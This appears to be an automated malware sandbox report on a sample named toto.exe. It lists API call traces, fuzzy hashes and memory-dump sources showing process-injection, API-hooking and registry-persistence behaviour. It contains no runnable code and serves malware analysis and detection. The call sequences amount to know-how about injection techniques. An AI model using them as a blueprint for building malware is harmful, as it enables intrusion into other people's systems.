    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: 2977C206A36F6D0CEC371F9F767DE1D3
Total matches: 148
Initial sample Analysis ID: 63005
Initial sample SHA 256: 663E6F25B541228C0555C984846E342BF801CAD542414DDD222BB947DEA49D56
Initial sample name: toto.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
